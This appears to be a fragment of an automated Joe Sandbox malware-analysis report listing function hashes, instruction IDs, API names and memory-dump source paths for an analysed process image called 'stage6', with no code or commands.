                                                                                              • Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
                                                                                              • Opcode Fuzzy Hash: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                                                                              • Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                                                              • Instruction ID: 7b72874d185f9504f09fa30b763c2e13130ca022e31a023e0d3144396e745bed
                                                                                              • Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                                                              • Instruction Fuzzy Hash: 1012A372A0C7118BD725DE18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                                                                              • Instruction ID: ba4386b7c12eba82c1b0c1a845e92ae21c1426ac82d7aa641ba094e7d1c8bfda
                                                                                              • Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                                                                              • Instruction Fuzzy Hash: FE021671A083128BC724CF28C4A16ABB7F1EFE5350F19852DE8C99B351E7389D85C786
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
                                                                                              • Instruction ID: 8cc232c379ab24ad0e8e110b9e0577a2d66b898ca13c535210c4519ca42de900
                                                                                              • Opcode Fuzzy Hash: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
                                                                                              • Instruction Fuzzy Hash: ACF12771E003258BCF24CF58C8516ABB7B2FF95314F198199D896AF355E7389C41CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                                                              • Instruction ID: bb9b723667839a33c3fd076cb6daf547bf5b8942c047ca41cb9a19f1e1e822b5
                                                                                              • Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                                                              • Instruction Fuzzy Hash: A3F1CC356087418FD724CF29C88066BFBE2EFD9300F08882EE5D597391E679E944CB96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                                                              • Instruction ID: 473c7c0e01890161c42436878ad5ddc7d20691f55e5b146572409273c410520a
                                                                                              • Opcode Fuzzy Hash: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                                                              • Instruction Fuzzy Hash: CAD1F575609700DBD3209F15D8417EBB3A5FFD6354F184A6EE8C98B391EB389840C79A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                                                                              • Instruction ID: 8f62d820d698011493e9b4d33d56c28701bf8a730f1a894cccb9041d930e3295
                                                                                              • Opcode Fuzzy Hash: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                                                                              • Instruction Fuzzy Hash: A4B148B5E00565CFCF10CF59E8417AEB7B1AF0A304F5A407AD899AB342D7399D01CBA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                                                                              • Instruction ID: 3d8e549ead381eb5a41ee94ce64dad1362128fe91ea456cb5e2966e39e4c66ca
                                                                                              • Opcode Fuzzy Hash: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                                                                              • Instruction Fuzzy Hash: A3B12536A083129BC724CF28C88056BB7E2FF99700F19953DEA8697366E735DC06D785
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                                                              • Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
                                                                                              • Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                                                              • Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
                                                                                              • Instruction ID: 3187122ed07642cbe4dcf9e03264eeaa439871456ea8a6719abbd84e200541cd
                                                                                              • Opcode Fuzzy Hash: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
                                                                                              • Instruction Fuzzy Hash: 4EA11436A043018BC718DF28D99092BB3F2EBC9710F1A957DE9869B365EB35DC05CB46
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                                                                              • Instruction ID: 89cd8c3f6ac805753dcfa7ea52abb159a623b373aaffce4ab273b97bd3830c78
                                                                                              • Opcode Fuzzy Hash: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                                                                              • Instruction Fuzzy Hash: CFB10575608790DFD714DF24E891A2BB7E2EF8A314F488A6DF0D5872A2D7388905CB16
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                                                                              • Instruction ID: cf6a0fb400f3c0121e69896af41eb3d2a2b4280c5d577effd33442f2baf9bc8c
                                                                                              • Opcode Fuzzy Hash: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                                                                              • Instruction Fuzzy Hash: CB81AE326053019BC7249F29C85067FB3A2FFC8710F2AD42DE9868B395EB349C52D785
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
                                                                                              • Instruction ID: ba880319810bdb8e213e259538359e713a98a4b2945b2457ae3d4c78796ecc2a
                                                                                              • Opcode Fuzzy Hash: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
                                                                                              • Instruction Fuzzy Hash: 47512A357043008FE7188F28C89577BB7E2EB9A320F18A62ED5D597392D7389C41C78A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
                                                                                              • Instruction ID: 19c9bc1ea9186e56c23c5e66cc144f5345884b6a785bfb5c303e44cb60fc86fa
                                                                                              • Opcode Fuzzy Hash: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
                                                                                              • Instruction Fuzzy Hash: 915126746083009BE7109F29DC45B2BB7E6EB89704F14982DF5C597292DB39DC05CBAB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
                                                                                              • Instruction ID: 6e37d88637f30dcf1ca5a39760ca9fc235c391d288c19f204446c63a880f3ae7
                                                                                              • Opcode Fuzzy Hash: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
                                                                                              • Instruction Fuzzy Hash: 0951AE30B483648FD710DA28A480267BBD2DF95320F8A867ED4D44B3D6E67DD90DD389
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6719c340687af9c7671d69fd13b02110751ddfc4bfd7c22202d719cfaa6f9092
                                                                                              • Instruction ID: f5f621b67306c00f1b1f1892e0c4b111cdc11732c84e43f9357b9df5953cc386
                                                                                              • Opcode Fuzzy Hash: 6719c340687af9c7671d69fd13b02110751ddfc4bfd7c22202d719cfaa6f9092
                                                                                              • Instruction Fuzzy Hash: 3E7160B840AB848FE774DF04D45868ABBE0FB8A358F52991ED48C47311C7B92448CF9B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
                                                                                              • Instruction ID: 2e66319cfaede8187dee7502eb2bdf6532bbee011b37898b3e62ff9ec94ea10c
                                                                                              • Opcode Fuzzy Hash: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
                                                                                              • Instruction Fuzzy Hash: 2C1166324092905AC314CB289940737BBE19B87310F584A5DF4D6E32E1D728CC028B8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                              • Instruction ID: 1bdb52c757136d0f491bb15e4131204bafb517a34a554dccf387603b88e59a22
                                                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                              • Instruction Fuzzy Hash: 4D11EC336055D40EC3198D3C84006657FD31AB7235F6953DAF4B89B2D3D5268DCA8359
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                                                                              • Instruction ID: 3de76f9d274b52e90d2ef9e87ec8d3366dafd7d2e10265ff4f1f4711345407d1
                                                                                              • Opcode Fuzzy Hash: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                                                                              • Instruction Fuzzy Hash: 7601B1F570171147D720AE51A9C0B27B2B86FC0748F19443EEC4457342DB7DEC29869E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                                                                              • Instruction ID: 34e981112378c59cf45707eac27e4188cbaca79d234523b47ecff1cb0040ee73
                                                                                              • Opcode Fuzzy Hash: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                                                                              • Instruction Fuzzy Hash: 59016DB9C00624EFEF00AF55DC01B9E77B6AB0A324F0414A5E508BB392D731ED10CB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                                                                              • Instruction ID: 76115147780e5b0d0309e2a0309811062aead7e9691d40ac881d7231c88a4ab0
                                                                                              • Opcode Fuzzy Hash: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                                                                              • Instruction Fuzzy Hash: 23E0D8FFD556600397548A235C02226B1936BDA628B1AB8788E9673707EA359C0741D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                                                                              • Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
                                                                                              • Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                                                                              • Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                                                                              • Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
                                                                                              • Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                                                                              • Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                                                              • Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
                                                                                              • Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                                                              • Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                              • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                                                                              • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                              • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                                                              • Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
                                                                                              • Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                                                              • Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocString
                                                                                              • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                              • API String ID: 2525500382-534244583
                                                                                              • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                              • Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
                                                                                              • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                              • Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocString
                                                                                              • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                              • API String ID: 2525500382-534244583
                                                                                              • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                              • Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
                                                                                              • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                              • Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit
                                                                                              • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                              • API String ID: 2610073882-1095711290
                                                                                              • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                              • Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
                                                                                              • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                              • Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit
                                                                                              • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                              • API String ID: 2610073882-1095711290
                                                                                              • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                              • Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
                                                                                              • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                              • Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitVariant
                                                                                              • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                              • API String ID: 1927566239-3011065302
                                                                                              • Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                              • Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
                                                                                              • Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                              • Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitVariant
                                                                                              • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                              • API String ID: 1927566239-3011065302
                                                                                              • Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                              • Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
                                                                                              • Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                              • Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit
                                                                                              • String ID: A$e$e$n$p$p$v$w$z$z
                                                                                              • API String ID: 2610073882-1114116150
                                                                                              • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                              • Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
                                                                                              • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                              • Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763